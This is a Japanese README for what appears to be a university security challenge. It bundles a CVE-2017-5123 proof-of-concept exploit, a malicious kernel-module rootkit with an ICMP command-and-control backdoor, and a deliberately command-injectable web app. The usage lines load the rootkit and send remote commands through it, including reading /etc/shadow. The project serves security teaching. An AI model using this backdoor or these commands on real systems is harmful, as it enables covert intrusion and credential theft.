
このリポジトリには、CVE-2017-5123 のデモンストレーション、ICMPコマンド&コントロールバックドア、およびCWE-78(OSコマンドインジェクション)の脆弱なWebアプリケーションが含まれています。
CSC 4308 - チャレンジ3 の一部です。
このプロジェクトでは、3つの異なるセキュリティ研究コンポーネントを紹介しています:
lkm/rootkit.c)Linuxカーネル4.13で導入された waitid システムコールの脆弱性に対する概念実証エクスプロイトです。この脆弱性により、権限昇格とサンドボックスエスケープが可能になります。
lkm/lkm.c)ICMPエコー(ping)パケットを介して隠密なコマンド&コントロールチャネルを実装する悪意のあるLinuxカーネルモジュール(LKM)です。
25678 のICMPエコー要求を傍受するvulnerable-app/)OSコマンドインジェクションに対して脆弱なReact + Node.jsのファイル共有アプリケーションです。
pinger/data-ping.c)カーネルルートキットのバックドアと通信するために、カスタムペイロードを持つ細工されたICMPエコー要求を送信するユーティリティです。
cd lkm
make
sudo insmod lkm.ko
cd ../pinger
gcc -o data-ping data-ping.c
# Must run as root to use raw sockets
sudo ./data-ping <target-ip> "whoami"
sudo ./data-ping localhost "ls -la /root"
sudo ./data-ping 192.168.1.100 "cat /etc/shadow"
sudo rmmod lkm
make reload
# Build the frontend
cd vulnerable-app/frontend
npm run build
# Copy build to backend
cp -r build ../backend/
# Start the backend server (serves both API and frontend)
cd ../backend
npm start
アプリケーションは http://localhost:3001 で利用できます。